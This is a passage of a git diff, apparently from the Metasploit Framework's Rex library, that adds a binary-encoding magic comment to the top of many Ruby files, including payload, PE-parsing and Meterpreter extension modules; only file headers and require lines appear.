@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/payloads/win32/kernel.rb b/lib/rex/payloads/win32/kernel.rb
index 1bd9b9da07..ac1ad92ec1 100644
--- a/lib/rex/payloads/win32/kernel.rb
+++ b/lib/rex/payloads/win32/kernel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/payloads/win32/kernel/common.rb b/lib/rex/payloads/win32/kernel/common.rb
index d671e0c498..bdff6a7afb 100644
--- a/lib/rex/payloads/win32/kernel/common.rb
+++ b/lib/rex/payloads/win32/kernel/common.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/payloads/win32/kernel/migration.rb b/lib/rex/payloads/win32/kernel/migration.rb
index 4e3ee264b8..bae8f41a03 100644
--- a/lib/rex/payloads/win32/kernel/migration.rb
+++ b/lib/rex/payloads/win32/kernel/migration.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/payloads/win32/kernel/recovery.rb b/lib/rex/payloads/win32/kernel/recovery.rb
index e57dce5fbf..b9825eafc1 100644
--- a/lib/rex/payloads/win32/kernel/recovery.rb
+++ b/lib/rex/payloads/win32/kernel/recovery.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/payloads/win32/kernel/stager.rb b/lib/rex/payloads/win32/kernel/stager.rb
index 927556736f..d961864349 100644
--- a/lib/rex/payloads/win32/kernel/stager.rb
+++ b/lib/rex/payloads/win32/kernel/stager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/peparsey.rb b/lib/rex/peparsey.rb
index d938a68fde..6e6addffe7 100644
--- a/lib/rex/peparsey.rb
+++ b/lib/rex/peparsey.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/peparsey/exceptions.rb b/lib/rex/peparsey/exceptions.rb
index 0a4ecd80df..45951f8322 100644
--- a/lib/rex/peparsey/exceptions.rb
+++ b/lib/rex/peparsey/exceptions.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/peparsey/pe.rb b/lib/rex/peparsey/pe.rb
index bad65cdc82..3966e06f0b 100644
--- a/lib/rex/peparsey/pe.rb
+++ b/lib/rex/peparsey/pe.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/peparsey/pe_memdump.rb b/lib/rex/peparsey/pe_memdump.rb
index 8adfbfb446..cf72ce5397 100644
--- a/lib/rex/peparsey/pe_memdump.rb
+++ b/lib/rex/peparsey/pe_memdump.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/peparsey/pebase.rb b/lib/rex/peparsey/pebase.rb
index dbb7359921..cb0af219e2 100644
--- a/lib/rex/peparsey/pebase.rb
+++ b/lib/rex/peparsey/pebase.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/peparsey/section.rb b/lib/rex/peparsey/section.rb
index 0e9873c5fa..dfec34e7a7 100644
--- a/lib/rex/peparsey/section.rb
+++ b/lib/rex/peparsey/section.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/pescan.rb b/lib/rex/pescan.rb
index 32099b9e44..163c6f0db5 100644
--- a/lib/rex/pescan.rb
+++ b/lib/rex/pescan.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/pescan/analyze.rb b/lib/rex/pescan/analyze.rb
index 38361d90a6..7a125776d4 100644
--- a/lib/rex/pescan/analyze.rb
+++ b/lib/rex/pescan/analyze.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module PeScan
module Analyze
diff --git a/lib/rex/pescan/scanner.rb b/lib/rex/pescan/scanner.rb
index b010a32edb..01e83bfd55 100644
--- a/lib/rex/pescan/scanner.rb
+++ b/lib/rex/pescan/scanner.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'metasm'
module Rex
diff --git a/lib/rex/pescan/search.rb b/lib/rex/pescan/search.rb
index 4214c1afb5..1202fd3bad 100644
--- a/lib/rex/pescan/search.rb
+++ b/lib/rex/pescan/search.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module PeScan
module Search
diff --git a/lib/rex/platforms.rb b/lib/rex/platforms.rb
index de1c712ef7..c6d29dfc7f 100644
--- a/lib/rex/platforms.rb
+++ b/lib/rex/platforms.rb
@@ -1 +1,2 @@
+# -*- coding: binary -*-
require 'rex/platforms/windows'
diff --git a/lib/rex/platforms/windows.rb b/lib/rex/platforms/windows.rb
index 72a793e865..85011d20b8 100644
--- a/lib/rex/platforms/windows.rb
+++ b/lib/rex/platforms/windows.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Platforms
module Windows
diff --git a/lib/rex/poly.rb b/lib/rex/poly.rb
index a1b957128f..7e3ebc6db0 100644
--- a/lib/rex/poly.rb
+++ b/lib/rex/poly.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Poly
diff --git a/lib/rex/poly/block.rb b/lib/rex/poly/block.rb
index 1239567e19..1b67290465 100644
--- a/lib/rex/poly/block.rb
+++ b/lib/rex/poly/block.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Poly
diff --git a/lib/rex/poly/register.rb b/lib/rex/poly/register.rb
index 08ed820d55..a7f38b4074 100644
--- a/lib/rex/poly/register.rb
+++ b/lib/rex/poly/register.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Poly
diff --git a/lib/rex/poly/register/x86.rb b/lib/rex/poly/register/x86.rb
index 7137cd03ad..7cdff36f61 100644
--- a/lib/rex/poly/register/x86.rb
+++ b/lib/rex/poly/register/x86.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/arch/x86'
module Rex
diff --git a/lib/rex/post.rb b/lib/rex/post.rb
index 0ff22b7d77..5cb7c96d74 100644
--- a/lib/rex/post.rb
+++ b/lib/rex/post.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# General independent containers
require 'rex/post/permission'
diff --git a/lib/rex/post/dir.rb b/lib/rex/post/dir.rb
index 7886661a0e..8c73148e6b 100644
--- a/lib/rex/post/dir.rb
+++ b/lib/rex/post/dir.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/file.rb b/lib/rex/post/file.rb
index 7ec3ce3e48..dd26dbdd8b 100644
--- a/lib/rex/post/file.rb
+++ b/lib/rex/post/file.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/io'
diff --git a/lib/rex/post/file_stat.rb b/lib/rex/post/file_stat.rb
index d2a3ff8e03..c5ecee2b8a 100644
--- a/lib/rex/post/file_stat.rb
+++ b/lib/rex/post/file_stat.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# This is just a container class basically, that acts like File::Struct
diff --git a/lib/rex/post/io.rb b/lib/rex/post/io.rb
index 582f90a903..17e71d1d76 100644
--- a/lib/rex/post/io.rb
+++ b/lib/rex/post/io.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter.rb b/lib/rex/post/meterpreter.rb
index 8c5da48ad8..47463ac399 100644
--- a/lib/rex/post/meterpreter.rb
+++ b/lib/rex/post/meterpreter.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/ui/console'
diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb
index 85b7f81eea..7424609c44 100644
--- a/lib/rex/post/meterpreter/channel.rb
+++ b/lib/rex/post/meterpreter/channel.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/inbound_packet_handler'
diff --git a/lib/rex/post/meterpreter/channel_container.rb b/lib/rex/post/meterpreter/channel_container.rb
index 9e78890f55..0bb689d667 100644
--- a/lib/rex/post/meterpreter/channel_container.rb
+++ b/lib/rex/post/meterpreter/channel_container.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/channels/pool.rb b/lib/rex/post/meterpreter/channels/pool.rb
index da39e6bdb7..37fe29437b 100644
--- a/lib/rex/post/meterpreter/channels/pool.rb
+++ b/lib/rex/post/meterpreter/channels/pool.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/channel'
diff --git a/lib/rex/post/meterpreter/channels/pools/file.rb b/lib/rex/post/meterpreter/channels/pools/file.rb
index eb5693d311..427e4c07b0 100644
--- a/lib/rex/post/meterpreter/channels/pools/file.rb
+++ b/lib/rex/post/meterpreter/channels/pools/file.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/channels/pool'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
diff --git a/lib/rex/post/meterpreter/channels/pools/stream_pool.rb b/lib/rex/post/meterpreter/channels/pools/stream_pool.rb
index cc72ed8d7a..5c08ece7d3 100644
--- a/lib/rex/post/meterpreter/channels/pools/stream_pool.rb
+++ b/lib/rex/post/meterpreter/channels/pools/stream_pool.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/channels/pool'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
diff --git a/lib/rex/post/meterpreter/channels/stream.rb b/lib/rex/post/meterpreter/channels/stream.rb
index aadab14540..c9635ee505 100644
--- a/lib/rex/post/meterpreter/channels/stream.rb
+++ b/lib/rex/post/meterpreter/channels/stream.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/post/meterpreter/channel'
diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb
index 3595f40ea9..cc5591b8e6 100644
--- a/lib/rex/post/meterpreter/client.rb
+++ b/lib/rex/post/meterpreter/client.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'socket'
require 'openssl'
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 313039beee..823dc8248c 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/packet'
require 'rex/post/meterpreter/extension'
diff --git a/lib/rex/post/meterpreter/dependencies.rb b/lib/rex/post/meterpreter/dependencies.rb
index 47852c5936..3aa429be7b 100644
--- a/lib/rex/post/meterpreter/dependencies.rb
+++ b/lib/rex/post/meterpreter/dependencies.rb
@@ -1,3 +1,4 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/permission'
diff --git a/lib/rex/post/meterpreter/extension.rb b/lib/rex/post/meterpreter/extension.rb
index 545f6abfb6..940f57d556 100644
--- a/lib/rex/post/meterpreter/extension.rb
+++ b/lib/rex/post/meterpreter/extension.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/extensions/espia/espia.rb b/lib/rex/post/meterpreter/extensions/espia/espia.rb
index 9039d9af6f..bd9ad1b388 100644
--- a/lib/rex/post/meterpreter/extensions/espia/espia.rb
+++ b/lib/rex/post/meterpreter/extensions/espia/espia.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/espia/tlv'
diff --git a/lib/rex/post/meterpreter/extensions/espia/tlv.rb b/lib/rex/post/meterpreter/extensions/espia/tlv.rb
index c9ff5ff0fc..1ae21b9bb2 100644
--- a/lib/rex/post/meterpreter/extensions/espia/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/espia/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
index 409b48f13d..9d55341802 100644
--- a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
+++ b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/incognito/tlv'
diff --git a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
index ce5ecc8861..586e69171a 100644
--- a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
index 51369931c8..3d9cccc549 100644
--- a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
+++ b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/lanattacks/tlv'
diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
index 1da165d755..9cb61b5403 100644
--- a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
index 5f3101e0b1..ce58a539e9 100644
--- a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
+++ b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/networkpug/tlv'
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
index d2d72e24ab..2712727e97 100644
--- a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/priv/fs.rb b/lib/rex/post/meterpreter/extensions/priv/fs.rb
index 93302ec8ea..bbb2a8914f 100644
--- a/lib/rex/post/meterpreter/extensions/priv/fs.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/fs.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/extensions/priv/passwd.rb b/lib/rex/post/meterpreter/extensions/priv/passwd.rb
index 927b5ffa30..57cf5a8fb7 100644
--- a/lib/rex/post/meterpreter/extensions/priv/passwd.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/passwd.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index c872bb766b..cc976d0752 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/priv/tlv'
require 'rex/post/meterpreter/extensions/priv/passwd'
diff --git a/lib/rex/post/meterpreter/extensions/priv/tlv.rb b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
index 30ec0837ec..92cf1b7f4a 100644
--- a/lib/rex/post/meterpreter/extensions/priv/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
index e126300e25..c9fe7bb416 100644
--- a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
+++ b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/sniffer/tlv'
require 'rex/proto/smb/utils'
diff --git a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
index 6daeb182eb..67f076f443 100644
--- a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb
index 81f2280421..332dda8a76 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
###
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb
index 0227430d91..de372cf0e9 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/dir'
require 'rex/post/meterpreter/extensions/stdapi/stdapi'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
index e407aa6422..53226ffa53 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/file'
require 'rex/post/meterpreter/channel'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb
index 6be7df6943..830b3552e5 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/file_stat'
require 'rex/post/meterpreter/extensions/stdapi/stdapi'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb
index da195893e9..9a5c271f70 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/io'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb
index c589375556..1af178a8f4 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/tlv'
require 'rex/post/meterpreter/extensions/stdapi/net/route'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb
index d0008b3ec6..66c9557fa5 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'ipaddr'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb
index 623e3f11a5..039187a1d4 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'ipaddr'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb
index a95ac226bd..793c03aa6c 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'thread'
require 'rex/socket'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb
index 364a483815..f4652142e6 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'thread'
require 'rex/post/meterpreter/channel'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
index 2b2bade265..1b2fc829b7 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'timeout'
require 'thread'
require 'rex/socket/parameters'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb
index fc6f8e019e..4947d60d79 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'timeout'
require 'rex/sync/thread_safe'
require 'rex/socket/udp'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb
index cd5baf30b5..c999567062 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__)))
$:.unshift(File.join(File.dirname(__FILE__), '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb
index bc68a23acb..6a8470400a 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager'
require 'thread'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb
index c091744902..84ca9f3112 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb
index a7953302ef..5619a207cb 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb
index 2b18f345bb..63fae0af3e 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb
index 01c309a9c9..fd3ad12684 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb
index 10e0e3c3dd..7edeb85a13 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb
index 54e0c25a11..aae31ab2ec 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb
index 03eab8ef5f..403b6f3c99 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb
index ad62b0f5f3..6ddc9c1f07 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb
index fe62795b30..6d65b189af 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb
index 639245e11c..3492cf9914 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb
@@ -1,3 +1,4 @@
